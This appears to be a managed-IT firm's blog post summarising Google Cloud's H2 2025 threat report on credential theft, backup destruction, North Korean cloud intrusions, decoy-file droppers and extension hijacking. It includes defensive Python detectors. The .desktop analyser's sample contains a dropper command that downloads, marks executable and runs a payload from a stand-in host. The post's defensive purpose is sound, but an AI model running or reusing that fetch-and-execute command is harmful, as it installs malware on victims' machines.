Google Cloud Threat Horizons H2 2025
New Research Shows Ransomware Groups Are Prioritizing Backup Infrastructure Destruction – When Your Backups Become the Target, Recovery Plans Need a Complete Rethink
Credential theft, backup destruction, and supply chain hijacking top the latest threat report from Google's security teams.
Google Cloud just released its H2 2025 Threat Horizons report, and the findings should concern any Houston business running workloads in the cloud. The report pulls intelligence from Google's Office of the CISO, Google Threat Intelligence Group, Mandiant Consulting, and multiple internal security teams. The picture it paints is clear: attackers are getting more targeted, more patient, and more destructive - especially when it comes to cloud environments.
CinchOps is a managed IT services provider based in Katy, Texas, serving small and mid-sized businesses across the Houston metro area. CinchOps specializes in cybersecurity, network security, managed IT support, VoIP, and SD-WAN for businesses with 10-200 employees. We've broken down the five major findings from this report and what they mean for your business.
This finding won't surprise anyone who's been paying attention, but the numbers drive the point home. During the first half of 2025, Google Cloud tracked the primary ways attackers got into cloud environments. The results are pretty damning for organizations that haven't locked down their identity and access controls.
A new wrinkle this cycle: leaked credentials found on dark web sources now account for 2.9% of initial access. That might sound small, but it represents a shift. Attackers are actively mining credential dumps and breach databases for cloud access keys, then using them before anyone notices. Google Cloud has started integrating with partners to automatically detect and disable leaked keys, but if you're not monitoring for this, you're exposed.
- Weak or missing credentials caused nearly half (47.1%) of all cloud security incidents tracked by Google in H1 2025
- Misconfigurations dropped 4.9% compared to H2 2024, but still represent 29.4% of entry points
- Leaked credentials from dark web sources are a growing vector at 2.9% of initial access
- Remote code execution stayed consistent at 2.9%, reinforcing the need for timely patching
- Google's vulnerability research team discovered critical Rsync flaws in Q4 2024 that could have enabled supply chain compromises through RCE
The pattern here hasn't changed in years. Businesses that nail the basics - strong credential policies, least-privilege access, and consistent patch management - block the vast majority of cloud attacks. We see this play out with Houston-area clients all the time. The ones who take identity management seriously almost never show up in our incident logs.
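The "leaked credentials" finding above is about cloud access keys turning up in dumps and repositories; the following is an added example (not code from Google or CinchOps) of a scanner that flags AWS access key IDs, Google API keys and GCP service-account key files in arbitrary text, redacting what it reports. Every sample value is constructed or a documented public example.

```python
"""Scan text (a paste, a repo file, a breach dump) for exposed cloud access keys.
Added example for this article, not code from Google or CinchOps. Every sample
value below is constructed or taken from public documentation."""
import json
import re

# Public, documented key shapes. A GCP service-account key is a whole JSON document,
# so it is detected by structure rather than by a single token.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
}


def redact(secret, keep=4):
    """Keep a short prefix so the owner can be identified, hide the rest."""
    return secret[:keep] + "*" * (len(secret) - keep)


def scan_text(text):
    findings = []
    for kind, pattern in PATTERNS.items():
        for m in pattern.finditer(text):
            findings.append({"type": kind, "value": redact(m.group(0)), "offset": m.start()})
    # Try every brace-delimited region as JSON and look for the service-account shape.
    for m in re.finditer(r"\{[^{}]*\}", text):
        try:
            obj = json.loads(m.group(0))
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict) and obj.get("type") == "service_account" and "private_key" in obj:
            findings.append({"type": "gcp_service_account_key",
                             "value": obj.get("client_email", "<unknown>"),
                             "offset": m.start()})
    return sorted(findings, key=lambda f: f["offset"])


# Constructed sample dump: AWS's documented example key, a synthetic API key of the
# right shape, and a minimal service-account key with a dummy private-key body.
SAMPLE_DUMP = (
    "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
    "maps_key = 'AIzaSyD-EXAMPLE" + "0" * 24 + "'\n"
    '{"type": "service_account", "project_id": "example-proj", '
    '"private_key": "-----BEGIN PRIVATE KEY-----\\nDUMMY\\n-----END PRIVATE KEY-----\\n", '
    '"client_email": "backup-sa@example-proj.iam.gserviceaccount.com"}\n'
)
```

Running `scan_text(SAMPLE_DUMP)` returns three findings in order of appearance; the same function can be pointed at commit diffs or paste-site captures as part of the monitoring the report recommends.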
This is probably the most alarming finding in the report for small and mid-sized businesses. Ransomware crews have figured out that the fastest path to a payday isn't just encrypting files - it's making sure you can't recover them. Multiple threat groups are now specifically hunting for backup systems as a primary objective, not an afterthought.
Google and Mandiant documented three named groups actively targeting backup infrastructure:
- UNC2165 (associated with RANSOMHUB) accessed cloud-based data backups, deleted backup routines and existing data, and modified user permissions to block recovery
- UNC4393 (previously linked to BASTA ransomware) targeted backup platforms directly
- UNC2465 (connected to DARKSIDE and LOCKBIT ransomware families) also focused on backup destruction
The Mandiant consulting team's incident response work revealed a consistent pattern of recovery failures. Backup data gets wiped or encrypted. Production systems sit offline during forensic investigation. Recovery plans stored on the same production environment become inaccessible. And most businesses don't have clearly defined Recovery Time Objectives (RTOs) or Recovery Point Objectives (RPOs) to guide the process.
Even worse, ransomware often takes out the infrastructure dependencies needed to access backups in the first place - Active Directory, DNS, DHCP, and virtualization platforms all have to come back online before backup orchestration tools can even function.
- Production-Integrated Backups (High Risk): Backups run on the same production network with shared credentials and connected infrastructure. Requires functioning production servers to restore.
- Isolated Data Vault (Medium Risk): Backups stored in a separate vault with restricted access. Better data integrity, but still depends on production systems for orchestration and restoration.
- Cloud Isolated Recovery Environment (Lowest Risk): Fully separated recovery infrastructure with immutable storage, isolated validation, and independent compute. Survives total production compromise.
Your Backups Need Their Own Protection Plan
The report recommends Cloud Isolated Recovery Environments (CIRE) that keep backup data logically separated from production, stored in immutable formats, and validated in isolated environments before restoration. If your backups sit on the same network as your production systems, they're a target, not a safety net. CinchOps can help Houston businesses build recovery architectures that survive a ransomware event.
Google Threat Intelligence Group tracks UNC4899, a North Korean threat group aligned with the Reconnaissance General Bureau (the same group publicly known as TraderTraitor). They've been active since at least 2020, primarily targeting cryptocurrency and blockchain companies. Between Q3 2024 and Q1 2025, Mandiant responded to two separate incidents attributed to this group - one affecting Google Cloud, the other affecting AWS.
Both attacks started the same way: social engineering over social media. The attackers contacted employees via LinkedIn and Telegram, posing as freelance recruiters with software development opportunities. They convinced the targets to download and run malicious Docker containers on their workstations. From there, backdoors like GLASSCANNON, PLOTTWIST, and MAZEWIRE established command-and-control connections.
- In the Google Cloud attack, UNC4899 stole credentials and used the Google Cloud CLI over an anonymous VPN. When MFA blocked their progress, they used the victim's admin privileges to temporarily disable MFA, completed the theft, then re-enabled MFA to hide their tracks
- In the AWS attack, IAM policies required temporary credentials and MFA for sensitive operations. The attackers couldn't bypass this, so they exfiltrated session cookies instead and used them to upload malicious JavaScript files that manipulated cryptocurrency transactions
- Both incidents resulted in several million dollars in cryptocurrency theft
- Social Engineering: Fake recruiter contact via LinkedIn or Telegram
- Malicious Docker: Victim runs untrusted container on workstation
- Credential Theft: Cloud keys & session cookies exfiltrated
- MFA Bypass: Admin privileges used to disable then re-enable MFA
- Crypto Theft: Millions in cryptocurrency stolen from cloud wallets
Two things stand out here. First, MFA actually worked in slowing the attackers down - it bought time and forced them to get creative. Second, the human element was the weakest link in both cases. An employee trusted a stranger on LinkedIn, ran untrusted code, and that was enough to open the door to a multi-million-dollar loss.
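The "disable MFA, act, re-enable MFA" sequence described above leaves a distinctive trail in admin audit logs. The following is an added example (not code from Google or CinchOps) of detection logic that pairs each MFA-disable event with its re-enable, lists what the same actor did in between, and also reports a disable that never gets reverted. The event schema is a constructed, normalized one, not any provider's native log format.

```python
"""Flag the 'disable MFA, act, re-enable MFA' sequence in audit events.

Added example for this article, not code from Google or CinchOps. The events use a
constructed, normalized schema (ts/actor/action), not any provider's native
audit-log format; map real logs onto it before use."""
from datetime import datetime

# Constructed sample events: one admin toggles MFA around a key export;
# a second admin disables MFA and never turns it back on.
SAMPLE_EVENTS = [
    {"ts": "2025-03-04T01:12:09Z", "actor": "admin@example.com", "action": "login"},
    {"ts": "2025-03-04T01:13:41Z", "actor": "admin@example.com", "action": "mfa.disable"},
    {"ts": "2025-03-04T01:14:02Z", "actor": "admin@example.com", "action": "key.create"},
    {"ts": "2025-03-04T01:19:30Z", "actor": "admin@example.com", "action": "data.export"},
    {"ts": "2025-03-04T01:21:05Z", "actor": "admin@example.com", "action": "mfa.enable"},
    {"ts": "2025-03-04T09:00:00Z", "actor": "ops@example.com", "action": "mfa.disable"},
]


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_mfa_toggles(events):
    """Return one finding per actor who disabled MFA.

    'toggled' findings list every action the actor took while MFA was off and
    how long it stayed off; a disable with no matching re-enable is reported as
    'still_disabled' so a quiet, permanent weakening is not missed either.
    """
    findings = []
    open_windows = {}  # actor -> [disable_time, actions taken while MFA was off]
    for ev in sorted(events, key=lambda e: e["ts"]):
        actor, action, when = ev["actor"], ev["action"], parse_ts(ev["ts"])
        if action == "mfa.disable":
            open_windows[actor] = [when, []]
        elif action == "mfa.enable" and actor in open_windows:
            start, between = open_windows.pop(actor)
            findings.append({"actor": actor, "status": "toggled",
                             "disabled_at": start.isoformat(),
                             "seconds_off": int((when - start).total_seconds()),
                             "actions_between": between})
        elif actor in open_windows:
            open_windows[actor][1].append(action)
    for actor, (start, between) in open_windows.items():
        findings.append({"actor": actor, "status": "still_disabled",
                         "disabled_at": start.isoformat(), "actions_between": between})
    return findings
```

A short window containing key creation or data export is the alert-worthy shape; a legitimate MFA policy change normally has a ticket and no privileged actions squeezed in between.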
For Houston businesses, the takeaway isn't about cryptocurrency. It's about how social engineering combined with cloud credential theft can devastate any organization. Energy services companies, law firms, CPA practices - any business where an employee might respond to a LinkedIn message from a "recruiter" is at risk.
This tactic is sneaky because it exploits the trust people have in platforms they use every day. Attackers host a normal-looking PDF on Google Drive, SharePoint, Dropbox, or GitHub. When a victim clicks the link, they see a legitimate document - an invoice, a report, an official-looking government notice. Meanwhile, malicious code runs silently in the background, downloading additional payloads, establishing persistence, and beginning data collection.
Google's intelligence teams documented both nation-state APT groups and financially motivated criminals using this approach. The technique works because:
- Links to well-known cloud storage domains don't trigger the same suspicion as unfamiliar websites
- Traditional security tools like basic firewalls and email gateways often don't flag downloads from trusted domains
- The decoy document keeps the victim distracted while the actual attack happens silently
- It's cheap and easy for attackers to create accounts on cloud storage platforms, sometimes using stolen credentials
Step 1: Phishing Email or Message Delivered
Victim receives a convincing email with a link to a file on Google Drive, SharePoint, Dropbox, or GitHub.
Step 2: Victim Clicks Trusted Cloud Link
The URL points to a legitimate cloud storage domain - no red flags for firewalls or email gateways.
Step 3: Malicious File Executes
Step 4: Secondary Payloads Deploy
Additional malware downloads from attacker infrastructure. Data exfiltration, credential harvesting, and lateral movement begin.
Step 5: Full Compromise
Attacker has persistent access. Victim still believes they opened a routine document.
The report also documented a newer variant targeting Linux systems, where .desktop files (application shortcuts in Unix environments) serve as first-stage droppers. These files download secondary payloads from attacker-controlled infrastructure while simultaneously displaying a decoy PDF from cloud storage to keep the victim unsuspecting.
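A .desktop dropper is visible in the file itself: the Exec line does more than open a document. The following is an added example (not code from Google or CinchOps) that parses .desktop files and flags the traits the paragraph above describes: an inline shell script, a download tool, a chmod, and a second URL for the decoy. Both sample files are constructed; the payload hostname is a reserved, non-resolving name.

```python
"""Flag .desktop shortcuts that behave like droppers: fetch and run a payload
while opening a decoy document. Added example for this article, not code from
Google or CinchOps; both sample files below are constructed."""
import configparser, os, re, shlex

BENIGN = """[Desktop Entry]
Name=Quarterly Report.pdf
Exec=xdg-open /home/user/Documents/report.pdf
Icon=application-pdf
"""

# Constructed dropper-style shortcut: the payload host is a reserved, non-resolving name.
SUSPICIOUS = """[Desktop Entry]
Name=Invoice_2025.pdf
Exec=bash -c "curl -s https://payload.invalid/x -o /tmp/.u && chmod +x /tmp/.u && /tmp/.u & xdg-open https://drive.google.com/file/d/DECOY_ID/view"
Icon=application-pdf
"""

FETCH_TOOLS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "zsh"}
VIEWERS = {"xdg-open", "evince", "okular"}
URL_RE = re.compile(r"https?://[^\s\"']+")


def analyse_desktop(text):
    """Parse one .desktop file and return why (if at all) it looks like a dropper."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case: 'Exec', not 'exec'
    cp.read_string(text)
    entry = cp["Desktop Entry"]
    name, exec_line = entry.get("Name", ""), entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        argv = exec_line.split()
    # Flatten 'sh -c "..."' payloads so the embedded commands become visible.
    tokens = {t for a in argv for t in re.split(r"[\s;&|]+", a) if t}
    cmd = os.path.basename(argv[0]) if argv else ""
    urls = URL_RE.findall(exec_line)
    checks = [
        (cmd in SHELLS and "-c" in argv, "Exec spawns a shell with an inline script"),
        (bool(tokens & FETCH_TOOLS), "Exec downloads content with curl/wget"),
        ("chmod" in tokens, "Exec marks a file executable"),
        (len(urls) >= 2, "Exec references several URLs (payload plus decoy)"),
        (name.lower().endswith(".pdf") and cmd not in VIEWERS,
         "Name claims a PDF but Exec is not a document viewer"),
    ]
    reasons = [msg for hit, msg in checks if hit]
    return {"name": name, "suspicious": bool(reasons), "reasons": reasons, "urls": urls}
```

Pointing `analyse_desktop` at files in `~/Desktop`, `~/.local/share/applications` and `~/.config/autostart` on Linux endpoints gives a cheap hunt for this first-stage technique; the benign sample produces no reasons, the constructed dropper produces all five.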
Iranian APT group APT42 combined this technique with spear-phishing emails that spoofed journalists, event organizers, and high-ranking officials - using typosquatting domains to make the impersonation more believable. The layering of social engineering with trusted cloud infrastructure makes these attacks particularly hard to spot.
The final major finding focuses on Chrome Web Store extensions - but the principles apply broadly to any software supply chain that relies on developer account security. When an attacker compromises a Chrome extension developer's account, they can push a malicious update to every user who has that extension installed. The attack surface multiplied in late 2024 when a wave of OAuth phishing attacks targeted CWS developers specifically.
Here's how the attack works. The Chrome Web Store signs extensions with two keys: a Google key confirming CWS processed it, and a developer key. Most developers let Google manage the developer key rather than risk handling it themselves. That shifted the security boundary entirely to developer account authentication. If an attacker phishes the developer's OAuth credentials, they get full upload access.
- CWS now requires MFA and frequent re-authentication for developer dashboard access
- OAuth API tokens (used for automated builds) don't have the same MFA protections
- Attackers trick developers into granting OAuth permissions to malicious projects, which then push poisoned updates
- Google launched "Verified CRX Upload" in May 2025, adding a second factor (a private signing key) to the upload process
- Even if an attacker steals credentials and OAuth tokens, they can't push updates without the developer's private signing key
For businesses in Katy, Sugar Land, and the broader Houston area, this matters because browser extensions have access to everything employees do in the browser. A compromised extension could intercept credentials, redirect financial transactions, or exfiltrate sensitive data - and users would have no idea. Endpoint security and browser management policies should be part of every IT support conversation.
Lock Down Your Browser Environment
Browser extension management is an often-overlooked piece of managed IT support. CinchOps helps Houston businesses maintain allowlists for approved extensions, block unauthorized installations, and monitor for suspicious extension behavior across all company endpoints.
The Google Cloud Threat Horizons report reads like a checklist of the services we provide to businesses across Houston, Katy, Sugar Land, and the surrounding areas. Here's how CinchOps directly addresses each of these threats:
- Identity and access management - We enforce MFA across all accounts, implement least-privilege access policies, monitor for credential leaks on dark web sources, and run regular access audits to close permission gaps before attackers find them
- Backup and disaster recovery architecture - Our business continuity and disaster recovery services include isolated backup systems, immutable storage configurations, defined RTOs and RPOs, and regular recovery testing so you know your backups actually work when you need them
- Security awareness training - We train your employees to recognize social engineering attacks, including the LinkedIn and Telegram-based approaches documented in this report. Your team is always your first line of defense
- Endpoint detection and browser management - We manage browser extension policies, monitor for suspicious endpoint behavior, and maintain visibility across your entire environment so decoy file attacks and compromised extensions get caught early
- Patch management and vulnerability scanning - We keep systems patched on schedule, scan for misconfigurations, and monitor for the kind of RCE vulnerabilities that Google's own research team flagged as critical
- Cloud security posture management - Whether you're on Microsoft 365, Google Workspace, or AWS, we monitor configurations, enforce security policies, and make sure your cloud environment isn't one of the 29.4% with a misconfiguration waiting to be exploited
In our 30 years of working in IT, the pattern hasn't changed. The businesses that invest in the fundamentals rarely end up in crisis. The ones who skip them pay much more later.
❓ Frequently Asked Questions
What are the top cloud security threats in 2025?
According to Google Cloud's H2 2025 Threat Horizons report, the top cloud threats are credential compromise at 47.1% of incidents, misconfigurations at 29.4%, API and UI compromises at 11.8%, and an emerging risk from leaked credentials found on dark web sources. Backup infrastructure targeting and supply chain attacks are also growing concerns.
Why are hackers targeting backup systems in cloud environments?
Ransomware groups are targeting backup infrastructure because destroying or encrypting backups eliminates a victim's ability to recover without paying the ransom. Groups like UNC2165, UNC4393, and UNC2465 have been observed deleting backup routines, wiping existing backup data, and modifying user permissions to block recovery efforts.
How can a managed IT provider help protect my business from cloud threats?
A managed IT provider like CinchOps continuously monitors cloud environments for credential misuse, misconfiguration, and suspicious activity. They enforce multi-factor authentication, maintain isolated backup systems, manage patching, and train employees to recognize social engineering attacks - all of which directly address the top attack vectors identified in the Google Cloud report.
What is a Cloud Isolated Recovery Environment (CIRE)?
A Cloud Isolated Recovery Environment is a backup architecture that separates recovery infrastructure from production systems using logical isolation, immutable storage, and on-demand validation environments. It ensures that even if attackers compromise production and standard backups, an isolated copy of critical data remains intact and recoverable.
How are North Korean hackers stealing cryptocurrency through cloud environments?
The threat group UNC4899, linked to North Korea's Reconnaissance General Bureau, uses social engineering on platforms like LinkedIn and Telegram to trick employees into running malicious software. They then steal cloud credentials, disable MFA requirements, and use administrative access to initiate unauthorized cryptocurrency transactions worth millions of dollars.